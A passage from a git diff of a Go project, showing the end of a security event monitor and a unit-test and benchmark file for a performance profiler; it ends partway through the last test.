// Handle the alert with all registered handlers
|
||||
for _, handler := range sm.alertHandlers {
|
||||
go func(h AlertHandler, a SecurityAlert) {
|
||||
if err := h.HandleAlert(a); err != nil {
|
||||
sm.RecordEvent(
|
||||
EventTypeError,
|
||||
"AlertHandler",
|
||||
fmt.Sprintf("Failed to handle alert: %v", err),
|
||||
SeverityMedium,
|
||||
map[string]interface{}{
|
||||
"handler": h.GetName(),
|
||||
"alert_id": a.ID,
|
||||
"error": err.Error(),
|
||||
},
|
||||
)
|
||||
}
|
||||
}(handler, alert)
|
||||
}
|
||||
|
||||
case <-sm.stopChan:
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// metricsCollector periodically collects and updates metrics
|
||||
func (sm *SecurityMonitor) metricsCollector() {
|
||||
ticker := time.NewTicker(sm.config.MetricsInterval)
|
||||
defer ticker.Stop()
|
||||
|
||||
for {
|
||||
select {
|
||||
case <-ticker.C:
|
||||
sm.collectMetrics()
|
||||
|
||||
case <-sm.stopChan:
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// collectMetrics collects current system metrics
|
||||
func (sm *SecurityMonitor) collectMetrics() {
|
||||
sm.metricsMutex.Lock()
|
||||
defer sm.metricsMutex.Unlock()
|
||||
|
||||
// This would collect metrics from various sources
|
||||
// For now, we'll just update the timestamp
|
||||
sm.metrics.LastUpdated = time.Now()
|
||||
}
|
||||
|
||||
// cleanupRoutine periodically cleans up old events and alerts
|
||||
func (sm *SecurityMonitor) cleanupRoutine() {
|
||||
ticker := time.NewTicker(sm.config.CleanupInterval)
|
||||
defer ticker.Stop()
|
||||
|
||||
for {
|
||||
select {
|
||||
case <-ticker.C:
|
||||
sm.cleanup()
|
||||
|
||||
case <-sm.stopChan:
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// cleanup removes old events and metrics
|
||||
func (sm *SecurityMonitor) cleanup() {
|
||||
sm.eventsMutex.Lock()
|
||||
defer sm.eventsMutex.Unlock()
|
||||
|
||||
// Remove old events
|
||||
cutoff := time.Now().Add(-sm.config.EventRetention)
|
||||
newEvents := make([]SecurityEvent, 0)
|
||||
|
||||
for _, event := range sm.events {
|
||||
if event.Timestamp.After(cutoff) {
|
||||
newEvents = append(newEvents, event)
|
||||
}
|
||||
}
|
||||
|
||||
sm.events = newEvents
|
||||
|
||||
// Clean up old metrics
|
||||
sm.metricsMutex.Lock()
|
||||
defer sm.metricsMutex.Unlock()
|
||||
|
||||
// Remove old hourly metrics (keep last 48 hours)
|
||||
hourCutoff := time.Now().Add(-48 * time.Hour)
|
||||
for hour := range sm.metrics.HourlyMetrics {
|
||||
if t, err := time.Parse("2006-01-02-15", hour); err == nil && t.Before(hourCutoff) {
|
||||
delete(sm.metrics.HourlyMetrics, hour)
|
||||
}
|
||||
}
|
||||
|
||||
// Remove old daily metrics (keep last 30 days)
|
||||
dayCutoff := time.Now().Add(-30 * 24 * time.Hour)
|
||||
for day := range sm.metrics.DailyMetrics {
|
||||
if t, err := time.Parse("2006-01-02", day); err == nil && t.Before(dayCutoff) {
|
||||
delete(sm.metrics.DailyMetrics, day)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// AddAlertHandler adds an alert handler
|
||||
func (sm *SecurityMonitor) AddAlertHandler(handler AlertHandler) {
|
||||
sm.alertHandlers = append(sm.alertHandlers, handler)
|
||||
}
|
||||
|
||||
// GetEvents returns recent security events
|
||||
func (sm *SecurityMonitor) GetEvents(limit int) []SecurityEvent {
|
||||
sm.eventsMutex.RLock()
|
||||
defer sm.eventsMutex.RUnlock()
|
||||
|
||||
if limit <= 0 || limit > len(sm.events) {
|
||||
limit = len(sm.events)
|
||||
}
|
||||
|
||||
events := make([]SecurityEvent, limit)
|
||||
copy(events, sm.events[len(sm.events)-limit:])
|
||||
|
||||
return events
|
||||
}
|
||||
|
||||
// GetMetrics returns current security metrics
|
||||
func (sm *SecurityMonitor) GetMetrics() *SecurityMetrics {
|
||||
sm.metricsMutex.RLock()
|
||||
defer sm.metricsMutex.RUnlock()
|
||||
|
||||
// Return a copy to avoid race conditions
|
||||
metrics := *sm.metrics
|
||||
metrics.HourlyMetrics = make(map[string]int64)
|
||||
metrics.DailyMetrics = make(map[string]int64)
|
||||
|
||||
for k, v := range sm.metrics.HourlyMetrics {
|
||||
metrics.HourlyMetrics[k] = v
|
||||
}
|
||||
for k, v := range sm.metrics.DailyMetrics {
|
||||
metrics.DailyMetrics[k] = v
|
||||
}
|
||||
|
||||
return &metrics
|
||||
}
|
||||
|
||||
// GetDashboardData returns data for security dashboard
|
||||
func (sm *SecurityMonitor) GetDashboardData() map[string]interface{} {
|
||||
metrics := sm.GetMetrics()
|
||||
recentEvents := sm.GetEvents(100)
|
||||
|
||||
// Calculate recent activity
|
||||
recentActivity := make(map[string]int)
|
||||
cutoff := time.Now().Add(-time.Hour)
|
||||
|
||||
for _, event := range recentEvents {
|
||||
if event.Timestamp.After(cutoff) {
|
||||
recentActivity[string(event.Type)]++
|
||||
}
|
||||
}
|
||||
|
||||
return map[string]interface{}{
|
||||
"metrics": metrics,
|
||||
"recent_events": recentEvents,
|
||||
"recent_activity": recentActivity,
|
||||
"system_status": sm.getSystemStatus(),
|
||||
"alert_summary": sm.getAlertSummary(),
|
||||
}
|
||||
}
|
||||
|
||||
// getSystemStatus returns current system security status
|
||||
func (sm *SecurityMonitor) getSystemStatus() map[string]interface{} {
|
||||
metrics := sm.GetMetrics()
|
||||
|
||||
status := "HEALTHY"
|
||||
if metrics.BlockedRequests > 0 || metrics.SuspiciousRequests > 0 {
|
||||
status = "MONITORING"
|
||||
}
|
||||
if metrics.DDoSAttempts > 0 || metrics.BruteForceAttempts > 0 {
|
||||
status = "UNDER_ATTACK"
|
||||
}
|
||||
|
||||
return map[string]interface{}{
|
||||
"status": status,
|
||||
"uptime": time.Since(metrics.LastUpdated).String(),
|
||||
"total_requests": metrics.TotalRequests,
|
||||
"blocked_requests": metrics.BlockedRequests,
|
||||
"success_rate": float64(metrics.TotalRequests-metrics.BlockedRequests) / float64(metrics.TotalRequests),
|
||||
}
|
||||
}
|
||||
|
||||
// getAlertSummary returns summary of recent alerts
|
||||
func (sm *SecurityMonitor) getAlertSummary() map[string]interface{} {
|
||||
// This would typically fetch from an alert store
|
||||
// For now, return basic summary
|
||||
return map[string]interface{}{
|
||||
"total_alerts": 0,
|
||||
"critical_alerts": 0,
|
||||
"unresolved_alerts": 0,
|
||||
"last_alert": nil,
|
||||
}
|
||||
}
|
||||
|
||||
// Stop stops the security monitor
|
||||
func (sm *SecurityMonitor) Stop() {
|
||||
close(sm.stopChan)
|
||||
}
|
||||
|
||||
// ExportEvents exports events to JSON
|
||||
func (sm *SecurityMonitor) ExportEvents() ([]byte, error) {
|
||||
sm.eventsMutex.RLock()
|
||||
defer sm.eventsMutex.RUnlock()
|
||||
|
||||
return json.MarshalIndent(sm.events, "", " ")
|
||||
}
|
||||
|
||||
// ExportMetrics exports metrics to JSON
|
||||
func (sm *SecurityMonitor) ExportMetrics() ([]byte, error) {
|
||||
metrics := sm.GetMetrics()
|
||||
return json.MarshalIndent(metrics, "", " ")
|
||||
}
|
||||
|
||||
// GetRecentAlerts returns the most recent security alerts
|
||||
func (sm *SecurityMonitor) GetRecentAlerts(limit int) []*SecurityAlert {
|
||||
sm.eventsMutex.RLock()
|
||||
defer sm.eventsMutex.RUnlock()
|
||||
|
||||
alerts := make([]*SecurityAlert, 0)
|
||||
count := 0
|
||||
|
||||
// Get recent events and convert to alerts
|
||||
for i := len(sm.events) - 1; i >= 0 && count < limit; i-- {
|
||||
event := sm.events[i]
|
||||
|
||||
// Convert SecurityEvent to SecurityAlert format expected by dashboard
|
||||
alert := &SecurityAlert{
|
||||
ID: fmt.Sprintf("alert_%d", i),
|
||||
Type: AlertType(event.Type),
|
||||
Level: AlertLevel(event.Severity),
|
||||
Title: "Security Alert",
|
||||
Description: event.Description,
|
||||
Timestamp: event.Timestamp,
|
||||
Source: event.Source,
|
||||
Data: event.Data,
|
||||
}
|
||||
|
||||
alerts = append(alerts, alert)
|
||||
count++
|
||||
}
|
||||
|
||||
return alerts
|
||||
}
|
||||
1316
orig/pkg/security/performance_profiler.go
Normal file
1316
orig/pkg/security/performance_profiler.go
Normal file
File diff suppressed because it is too large
Load Diff
586
orig/pkg/security/performance_profiler_test.go
Normal file
586
orig/pkg/security/performance_profiler_test.go
Normal file
@@ -0,0 +1,586 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"runtime"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
|
||||
"github.com/fraktal/mev-beta/internal/logger"
|
||||
)
|
||||
|
||||
func TestNewPerformanceProfiler(t *testing.T) {
|
||||
testLogger := logger.New("info", "text", "/tmp/test.log")
|
||||
|
||||
// Test with default config
|
||||
profiler := NewPerformanceProfiler(testLogger, nil)
|
||||
assert.NotNil(t, profiler)
|
||||
assert.NotNil(t, profiler.config)
|
||||
assert.Equal(t, time.Second, profiler.config.SamplingInterval)
|
||||
assert.Equal(t, 24*time.Hour, profiler.config.RetentionPeriod)
|
||||
|
||||
// Test with custom config
|
||||
customConfig := &ProfilerConfig{
|
||||
SamplingInterval: 500 * time.Millisecond,
|
||||
RetentionPeriod: 12 * time.Hour,
|
||||
MaxOperations: 500,
|
||||
MaxMemoryUsage: 512 * 1024 * 1024,
|
||||
MaxGoroutines: 500,
|
||||
MaxResponseTime: 500 * time.Millisecond,
|
||||
MinThroughput: 50,
|
||||
EnableGCMetrics: false,
|
||||
EnableCPUProfiling: false,
|
||||
EnableMemProfiling: false,
|
||||
ReportInterval: 30 * time.Minute,
|
||||
AutoOptimize: true,
|
||||
}
|
||||
|
||||
profiler2 := NewPerformanceProfiler(testLogger, customConfig)
|
||||
assert.NotNil(t, profiler2)
|
||||
assert.Equal(t, 500*time.Millisecond, profiler2.config.SamplingInterval)
|
||||
assert.Equal(t, 12*time.Hour, profiler2.config.RetentionPeriod)
|
||||
assert.True(t, profiler2.config.AutoOptimize)
|
||||
|
||||
// Cleanup
|
||||
profiler.Stop()
|
||||
profiler2.Stop()
|
||||
}
|
||||
|
||||
func TestOperationTracking(t *testing.T) {
|
||||
testLogger := logger.New("info", "text", "/tmp/test.log")
|
||||
profiler := NewPerformanceProfiler(testLogger, nil)
|
||||
defer profiler.Stop()
|
||||
|
||||
// Test basic operation tracking
|
||||
tracker := profiler.StartOperation("test_operation")
|
||||
time.Sleep(10 * time.Millisecond) // Simulate work
|
||||
tracker.End()
|
||||
|
||||
// Verify operation was recorded
|
||||
profiler.mutex.RLock()
|
||||
profile, exists := profiler.operations["test_operation"]
|
||||
profiler.mutex.RUnlock()
|
||||
|
||||
assert.True(t, exists)
|
||||
assert.Equal(t, "test_operation", profile.Operation)
|
||||
assert.Equal(t, int64(1), profile.TotalCalls)
|
||||
assert.Greater(t, profile.TotalDuration, time.Duration(0))
|
||||
assert.Greater(t, profile.AverageTime, time.Duration(0))
|
||||
assert.Equal(t, 0.0, profile.ErrorRate)
|
||||
assert.NotEmpty(t, profile.PerformanceClass)
|
||||
}
|
||||
|
||||
func TestOperationTrackingWithError(t *testing.T) {
|
||||
testLogger := logger.New("info", "text", "/tmp/test.log")
|
||||
profiler := NewPerformanceProfiler(testLogger, nil)
|
||||
defer profiler.Stop()
|
||||
|
||||
// Test operation tracking with error
|
||||
tracker := profiler.StartOperation("error_operation")
|
||||
time.Sleep(5 * time.Millisecond)
|
||||
tracker.EndWithError(assert.AnError)
|
||||
|
||||
// Verify error was recorded
|
||||
profiler.mutex.RLock()
|
||||
profile, exists := profiler.operations["error_operation"]
|
||||
profiler.mutex.RUnlock()
|
||||
|
||||
assert.True(t, exists)
|
||||
assert.Equal(t, int64(1), profile.ErrorCount)
|
||||
assert.Equal(t, 100.0, profile.ErrorRate)
|
||||
assert.Equal(t, assert.AnError.Error(), profile.LastError)
|
||||
assert.False(t, profile.LastErrorTime.IsZero())
|
||||
}
|
||||
|
||||
func TestPerformanceClassification(t *testing.T) {
|
||||
testLogger := logger.New("info", "text", "/tmp/test.log")
|
||||
profiler := NewPerformanceProfiler(testLogger, nil)
|
||||
defer profiler.Stop()
|
||||
|
||||
testCases := []struct {
|
||||
name string
|
||||
sleepDuration time.Duration
|
||||
expectedClass string
|
||||
}{
|
||||
{"excellent", 1 * time.Millisecond, "excellent"},
|
||||
{"good", 20 * time.Millisecond, "good"},
|
||||
{"average", 100 * time.Millisecond, "average"},
|
||||
}
|
||||
|
||||
for _, tc := range testCases {
|
||||
t.Run(tc.name, func(t *testing.T) {
|
||||
tracker := profiler.StartOperation(tc.name)
|
||||
time.Sleep(tc.sleepDuration)
|
||||
tracker.End()
|
||||
|
||||
profiler.mutex.RLock()
|
||||
profile := profiler.operations[tc.name]
|
||||
profiler.mutex.RUnlock()
|
||||
|
||||
assert.Equal(t, tc.expectedClass, profile.PerformanceClass)
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestSystemMetricsCollection(t *testing.T) {
|
||||
testLogger := logger.New("info", "text", "/tmp/test.log")
|
||||
config := &ProfilerConfig{
|
||||
SamplingInterval: 100 * time.Millisecond,
|
||||
RetentionPeriod: time.Hour,
|
||||
}
|
||||
profiler := NewPerformanceProfiler(testLogger, config)
|
||||
defer profiler.Stop()
|
||||
|
||||
// Wait for metrics collection
|
||||
time.Sleep(200 * time.Millisecond)
|
||||
|
||||
profiler.mutex.RLock()
|
||||
metrics := profiler.metrics
|
||||
resourceUsage := profiler.resourceUsage
|
||||
profiler.mutex.RUnlock()
|
||||
|
||||
// Verify system metrics were collected
|
||||
assert.NotNil(t, metrics["heap_alloc"])
|
||||
assert.NotNil(t, metrics["heap_sys"])
|
||||
assert.NotNil(t, metrics["goroutines"])
|
||||
assert.NotNil(t, metrics["gc_cycles"])
|
||||
|
||||
// Verify resource usage was updated
|
||||
assert.Greater(t, resourceUsage.HeapUsed, uint64(0))
|
||||
assert.GreaterOrEqual(t, resourceUsage.GCCycles, uint32(0))
|
||||
assert.False(t, resourceUsage.Timestamp.IsZero())
|
||||
}
|
||||
|
||||
func TestPerformanceAlerts(t *testing.T) {
|
||||
testLogger := logger.New("info", "text", "/tmp/test.log")
|
||||
config := &ProfilerConfig{
|
||||
SamplingInterval: time.Second,
|
||||
MaxResponseTime: 10 * time.Millisecond, // Very low threshold for testing
|
||||
}
|
||||
profiler := NewPerformanceProfiler(testLogger, config)
|
||||
defer profiler.Stop()
|
||||
|
||||
// Trigger a slow operation to generate alert
|
||||
tracker := profiler.StartOperation("slow_operation")
|
||||
time.Sleep(50 * time.Millisecond) // Exceeds threshold
|
||||
tracker.End()
|
||||
|
||||
// Check if alert was generated
|
||||
profiler.mutex.RLock()
|
||||
alerts := profiler.alerts
|
||||
profiler.mutex.RUnlock()
|
||||
|
||||
assert.NotEmpty(t, alerts)
|
||||
|
||||
foundAlert := false
|
||||
for _, alert := range alerts {
|
||||
if alert.Operation == "slow_operation" && alert.Type == "response_time" {
|
||||
foundAlert = true
|
||||
assert.Contains(t, []string{"warning", "critical"}, alert.Severity)
|
||||
assert.Greater(t, alert.Value, 10.0) // Should exceed 10ms threshold
|
||||
break
|
||||
}
|
||||
}
|
||||
assert.True(t, foundAlert, "Expected to find response time alert for slow operation")
|
||||
}
|
||||
|
||||
func TestReportGeneration(t *testing.T) {
|
||||
testLogger := logger.New("info", "text", "/tmp/test.log")
|
||||
profiler := NewPerformanceProfiler(testLogger, nil)
|
||||
defer profiler.Stop()
|
||||
|
||||
// Generate some test data
|
||||
tracker1 := profiler.StartOperation("fast_op")
|
||||
time.Sleep(1 * time.Millisecond)
|
||||
tracker1.End()
|
||||
|
||||
tracker2 := profiler.StartOperation("slow_op")
|
||||
time.Sleep(50 * time.Millisecond)
|
||||
tracker2.End()
|
||||
|
||||
// Generate report
|
||||
report, err := profiler.GenerateReport()
|
||||
require.NoError(t, err)
|
||||
assert.NotNil(t, report)
|
||||
|
||||
// Verify report structure
|
||||
assert.NotEmpty(t, report.ID)
|
||||
assert.False(t, report.Timestamp.IsZero())
|
||||
assert.NotEmpty(t, report.OverallHealth)
|
||||
assert.GreaterOrEqual(t, report.HealthScore, 0.0)
|
||||
assert.LessOrEqual(t, report.HealthScore, 100.0)
|
||||
|
||||
// Verify operations are included
|
||||
assert.NotEmpty(t, report.TopOperations)
|
||||
assert.NotNil(t, report.ResourceSummary)
|
||||
assert.NotNil(t, report.TrendAnalysis)
|
||||
assert.NotNil(t, report.OptimizationPlan)
|
||||
|
||||
// Verify resource summary
|
||||
assert.GreaterOrEqual(t, report.ResourceSummary.MemoryEfficiency, 0.0)
|
||||
assert.LessOrEqual(t, report.ResourceSummary.MemoryEfficiency, 100.0)
|
||||
assert.GreaterOrEqual(t, report.ResourceSummary.CPUEfficiency, 0.0)
|
||||
assert.LessOrEqual(t, report.ResourceSummary.CPUEfficiency, 100.0)
|
||||
}
|
||||
|
||||
func TestBottleneckAnalysis(t *testing.T) {
|
||||
testLogger := logger.New("info", "text", "/tmp/test.log")
|
||||
profiler := NewPerformanceProfiler(testLogger, nil)
|
||||
defer profiler.Stop()
|
||||
|
||||
// Create operations with different performance characteristics
|
||||
tracker1 := profiler.StartOperation("critical_op")
|
||||
time.Sleep(200 * time.Millisecond) // This should be classified as poor/critical
|
||||
tracker1.End()
|
||||
|
||||
tracker2 := profiler.StartOperation("good_op")
|
||||
time.Sleep(1 * time.Millisecond) // This should be excellent
|
||||
tracker2.End()
|
||||
|
||||
// Generate report to trigger bottleneck analysis
|
||||
report, err := profiler.GenerateReport()
|
||||
require.NoError(t, err)
|
||||
|
||||
// Should detect performance bottleneck for critical_op
|
||||
assert.NotEmpty(t, report.Bottlenecks)
|
||||
|
||||
foundBottleneck := false
|
||||
for _, bottleneck := range report.Bottlenecks {
|
||||
if bottleneck.Operation == "critical_op" || bottleneck.Type == "performance" {
|
||||
foundBottleneck = true
|
||||
assert.Contains(t, []string{"medium", "high"}, bottleneck.Severity)
|
||||
assert.Greater(t, bottleneck.Impact, 0.0)
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
// Note: May not always find bottleneck due to classification thresholds
|
||||
if !foundBottleneck {
|
||||
t.Log("Bottleneck not detected - this may be due to classification thresholds")
|
||||
}
|
||||
}
|
||||
|
||||
func TestImprovementSuggestions(t *testing.T) {
|
||||
testLogger := logger.New("info", "text", "/tmp/test.log")
|
||||
profiler := NewPerformanceProfiler(testLogger, nil)
|
||||
defer profiler.Stop()
|
||||
|
||||
// Simulate memory pressure by allocating memory
|
||||
largeData := make([]byte, 100*1024*1024) // 100MB
|
||||
_ = largeData
|
||||
|
||||
// Force GC to update memory stats
|
||||
runtime.GC()
|
||||
time.Sleep(100 * time.Millisecond)
|
||||
|
||||
// Create a slow operation
|
||||
tracker := profiler.StartOperation("slow_operation")
|
||||
time.Sleep(300 * time.Millisecond) // Should be classified as poor/critical
|
||||
tracker.End()
|
||||
|
||||
// Generate report
|
||||
report, err := profiler.GenerateReport()
|
||||
require.NoError(t, err)
|
||||
|
||||
// Should have improvement suggestions
|
||||
assert.NotNil(t, report.Improvements)
|
||||
|
||||
// Look for memory or performance improvements
|
||||
hasMemoryImprovement := false
|
||||
hasPerformanceImprovement := false
|
||||
|
||||
for _, suggestion := range report.Improvements {
|
||||
if suggestion.Area == "memory" {
|
||||
hasMemoryImprovement = true
|
||||
}
|
||||
if suggestion.Area == "operation_slow_operation" {
|
||||
hasPerformanceImprovement = true
|
||||
}
|
||||
}
|
||||
|
||||
// At least one type of improvement should be suggested
|
||||
assert.True(t, hasMemoryImprovement || hasPerformanceImprovement,
|
||||
"Expected memory or performance improvement suggestions")
|
||||
}
|
||||
|
||||
func TestMetricsExport(t *testing.T) {
|
||||
testLogger := logger.New("info", "text", "/tmp/test.log")
|
||||
profiler := NewPerformanceProfiler(testLogger, nil)
|
||||
defer profiler.Stop()
|
||||
|
||||
// Wait for some metrics to be collected
|
||||
time.Sleep(100 * time.Millisecond)
|
||||
|
||||
// Test JSON export
|
||||
jsonData, err := profiler.ExportMetrics("json")
|
||||
require.NoError(t, err)
|
||||
assert.NotEmpty(t, jsonData)
|
||||
|
||||
// Verify it's valid JSON
|
||||
var metrics map[string]*PerformanceMetric
|
||||
err = json.Unmarshal(jsonData, &metrics)
|
||||
require.NoError(t, err)
|
||||
assert.NotEmpty(t, metrics)
|
||||
|
||||
// Test Prometheus export
|
||||
promData, err := profiler.ExportMetrics("prometheus")
|
||||
require.NoError(t, err)
|
||||
assert.NotEmpty(t, promData)
|
||||
assert.Contains(t, string(promData), "# HELP")
|
||||
assert.Contains(t, string(promData), "# TYPE")
|
||||
assert.Contains(t, string(promData), "mev_bot_")
|
||||
|
||||
// Test unsupported format
|
||||
_, err = profiler.ExportMetrics("unsupported")
|
||||
assert.Error(t, err)
|
||||
assert.Contains(t, err.Error(), "unsupported export format")
|
||||
}
|
||||
|
||||
func TestThresholdConfiguration(t *testing.T) {
|
||||
testLogger := logger.New("info", "text", "/tmp/test.log")
|
||||
profiler := NewPerformanceProfiler(testLogger, nil)
|
||||
defer profiler.Stop()
|
||||
|
||||
// Verify default thresholds were set
|
||||
profiler.mutex.RLock()
|
||||
thresholds := profiler.thresholds
|
||||
profiler.mutex.RUnlock()
|
||||
|
||||
assert.NotEmpty(t, thresholds)
|
||||
assert.Contains(t, thresholds, "memory_usage")
|
||||
assert.Contains(t, thresholds, "goroutine_count")
|
||||
assert.Contains(t, thresholds, "response_time")
|
||||
assert.Contains(t, thresholds, "error_rate")
|
||||
|
||||
// Verify threshold structure
|
||||
memThreshold := thresholds["memory_usage"]
|
||||
assert.Equal(t, "memory_usage", memThreshold.Metric)
|
||||
assert.Greater(t, memThreshold.Warning, 0.0)
|
||||
assert.Greater(t, memThreshold.Critical, memThreshold.Warning)
|
||||
assert.Equal(t, "gt", memThreshold.Operator)
|
||||
}
|
||||
|
||||
func TestResourceEfficiencyCalculation(t *testing.T) {
|
||||
testLogger := logger.New("info", "text", "/tmp/test.log")
|
||||
profiler := NewPerformanceProfiler(testLogger, nil)
|
||||
defer profiler.Stop()
|
||||
|
||||
// Create operations with different performance classes
|
||||
tracker1 := profiler.StartOperation("excellent_op")
|
||||
time.Sleep(1 * time.Millisecond)
|
||||
tracker1.End()
|
||||
|
||||
tracker2 := profiler.StartOperation("good_op")
|
||||
time.Sleep(20 * time.Millisecond)
|
||||
tracker2.End()
|
||||
|
||||
// Calculate efficiencies
|
||||
memEfficiency := profiler.calculateMemoryEfficiency()
|
||||
cpuEfficiency := profiler.calculateCPUEfficiency()
|
||||
gcEfficiency := profiler.calculateGCEfficiency()
|
||||
throughputScore := profiler.calculateThroughputScore()
|
||||
|
||||
// All efficiency scores should be between 0 and 100
|
||||
assert.GreaterOrEqual(t, memEfficiency, 0.0)
|
||||
assert.LessOrEqual(t, memEfficiency, 100.0)
|
||||
assert.GreaterOrEqual(t, cpuEfficiency, 0.0)
|
||||
assert.LessOrEqual(t, cpuEfficiency, 100.0)
|
||||
assert.GreaterOrEqual(t, gcEfficiency, 0.0)
|
||||
assert.LessOrEqual(t, gcEfficiency, 100.0)
|
||||
assert.GreaterOrEqual(t, throughputScore, 0.0)
|
||||
assert.LessOrEqual(t, throughputScore, 100.0)
|
||||
|
||||
// CPU efficiency should be high since we have good operations
|
||||
assert.Greater(t, cpuEfficiency, 50.0)
|
||||
}
|
||||
|
||||
func TestCleanupOldData(t *testing.T) {
|
||||
testLogger := logger.New("info", "text", "/tmp/test.log")
|
||||
config := &ProfilerConfig{
|
||||
RetentionPeriod: 100 * time.Millisecond, // Very short for testing
|
||||
}
|
||||
profiler := NewPerformanceProfiler(testLogger, config)
|
||||
defer profiler.Stop()
|
||||
|
||||
// Create some alerts
|
||||
profiler.mutex.Lock()
|
||||
oldAlert := PerformanceAlert{
|
||||
ID: "old_alert",
|
||||
Timestamp: time.Now().Add(-200 * time.Millisecond), // Older than retention
|
||||
}
|
||||
newAlert := PerformanceAlert{
|
||||
ID: "new_alert",
|
||||
Timestamp: time.Now(),
|
||||
}
|
||||
profiler.alerts = []PerformanceAlert{oldAlert, newAlert}
|
||||
profiler.mutex.Unlock()
|
||||
|
||||
// Trigger cleanup
|
||||
profiler.cleanupOldData()
|
||||
|
||||
// Verify old data was removed
|
||||
profiler.mutex.RLock()
|
||||
alerts := profiler.alerts
|
||||
profiler.mutex.RUnlock()
|
||||
|
||||
assert.Len(t, alerts, 1)
|
||||
assert.Equal(t, "new_alert", alerts[0].ID)
|
||||
}
|
||||
|
||||
func TestOptimizationPlanGeneration(t *testing.T) {
|
||||
testLogger := logger.New("info", "text", "/tmp/test.log")
|
||||
profiler := NewPerformanceProfiler(testLogger, nil)
|
||||
defer profiler.Stop()
|
||||
|
||||
// Create test recommendations
|
||||
recommendations := []PerformanceRecommendation{
|
||||
{
|
||||
Type: "immediate",
|
||||
Priority: "high",
|
||||
Category: "memory",
|
||||
Title: "Fix Memory Leak",
|
||||
ExpectedGain: 25.0,
|
||||
},
|
||||
{
|
||||
Type: "short_term",
|
||||
Priority: "medium",
|
||||
Category: "algorithm",
|
||||
Title: "Optimize Algorithm",
|
||||
ExpectedGain: 40.0,
|
||||
},
|
||||
{
|
||||
Type: "long_term",
|
||||
Priority: "low",
|
||||
Category: "architecture",
|
||||
Title: "Refactor Architecture",
|
||||
ExpectedGain: 15.0,
|
||||
},
|
||||
}
|
||||
|
||||
// Generate optimization plan
|
||||
plan := profiler.createOptimizationPlan(recommendations)
|
||||
|
||||
assert.NotNil(t, plan)
|
||||
assert.Equal(t, 80.0, plan.TotalGain) // 25 + 40 + 15
|
||||
assert.Greater(t, plan.Timeline, time.Duration(0))
|
||||
|
||||
// Verify phase categorization
|
||||
assert.Len(t, plan.Phase1, 1) // immediate
|
||||
assert.Len(t, plan.Phase2, 1) // short_term
|
||||
assert.Len(t, plan.Phase3, 1) // long_term
|
||||
|
||||
assert.Equal(t, "Fix Memory Leak", plan.Phase1[0].Title)
|
||||
assert.Equal(t, "Optimize Algorithm", plan.Phase2[0].Title)
|
||||
assert.Equal(t, "Refactor Architecture", plan.Phase3[0].Title)
|
||||
}
|
||||
|
||||
func TestConcurrentOperationTracking(t *testing.T) {
|
||||
testLogger := logger.New("info", "text", "/tmp/test.log")
|
||||
profiler := NewPerformanceProfiler(testLogger, nil)
|
||||
defer profiler.Stop()
|
||||
|
||||
// Run multiple operations concurrently
|
||||
numOperations := 100
|
||||
done := make(chan bool, numOperations)
|
||||
|
||||
for i := 0; i < numOperations; i++ {
|
||||
go func(id int) {
|
||||
defer func() { done <- true }()
|
||||
|
||||
tracker := profiler.StartOperation("concurrent_op")
|
||||
time.Sleep(1 * time.Millisecond)
|
||||
tracker.End()
|
||||
}(i)
|
||||
}
|
||||
|
||||
// Wait for all operations to complete
|
||||
for i := 0; i < numOperations; i++ {
|
||||
<-done
|
||||
}
|
||||
|
||||
// Verify all operations were tracked
|
||||
profiler.mutex.RLock()
|
||||
profile := profiler.operations["concurrent_op"]
|
||||
profiler.mutex.RUnlock()
|
||||
|
||||
assert.NotNil(t, profile)
|
||||
assert.Equal(t, int64(numOperations), profile.TotalCalls)
|
||||
assert.Greater(t, profile.TotalDuration, time.Duration(0))
|
||||
assert.Equal(t, 0.0, profile.ErrorRate) // No errors expected
|
||||
}
|
||||
|
||||
func BenchmarkOperationTracking(b *testing.B) {
|
||||
testLogger := logger.New("error", "text", "/tmp/test.log") // Reduce logging noise
|
||||
profiler := NewPerformanceProfiler(testLogger, nil)
|
||||
defer profiler.Stop()
|
||||
|
||||
b.ResetTimer()
|
||||
b.RunParallel(func(pb *testing.PB) {
|
||||
for pb.Next() {
|
||||
tracker := profiler.StartOperation("benchmark_op")
|
||||
// Simulate minimal work
|
||||
runtime.Gosched()
|
||||
tracker.End()
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
func BenchmarkReportGeneration(b *testing.B) {
|
||||
testLogger := logger.New("error", "text", "/tmp/test.log")
|
||||
profiler := NewPerformanceProfiler(testLogger, nil)
|
||||
defer profiler.Stop()
|
||||
|
||||
// Create some sample data
|
||||
for i := 0; i < 10; i++ {
|
||||
tracker := profiler.StartOperation("sample_op")
|
||||
time.Sleep(time.Microsecond)
|
||||
tracker.End()
|
||||
}
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
_, err := profiler.GenerateReport()
|
||||
if err != nil {
|
||||
b.Fatal(err)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestHealthScoreCalculation(t *testing.T) {
|
||||
testLogger := logger.New("info", "text", "/tmp/test.log")
|
||||
profiler := NewPerformanceProfiler(testLogger, nil)
|
||||
defer profiler.Stop()
|
||||
|
||||
// Test with clean system (should have high health score)
|
||||
health, score := profiler.calculateOverallHealth()
|
||||
assert.NotEmpty(t, health)
|
||||
assert.GreaterOrEqual(t, score, 0.0)
|
||||
assert.LessOrEqual(t, score, 100.0)
|
||||
assert.Equal(t, "excellent", health) // Should be excellent with no issues
|
||||
|
||||
// Add some performance issues
|
||||
profiler.mutex.Lock()
|
||||
profiler.operations["poor_op"] = &OperationProfile{
|
||||
Operation: "poor_op",
|
||||
PerformanceClass: "poor",
|
||||
}
|
||||
profiler.operations["critical_op"] = &OperationProfile{
|
||||
Operation: "critical_op",
|
||||
PerformanceClass: "critical",
|
||||
}
|
||||
profiler.alerts = append(profiler.alerts, PerformanceAlert{
|
||||
Severity: "warning",
|
||||
})
|
||||
profiler.alerts = append(profiler.alerts, PerformanceAlert{
|
||||
Severity: "critical",
|
||||
})
|
||||
profiler.mutex.Unlock()
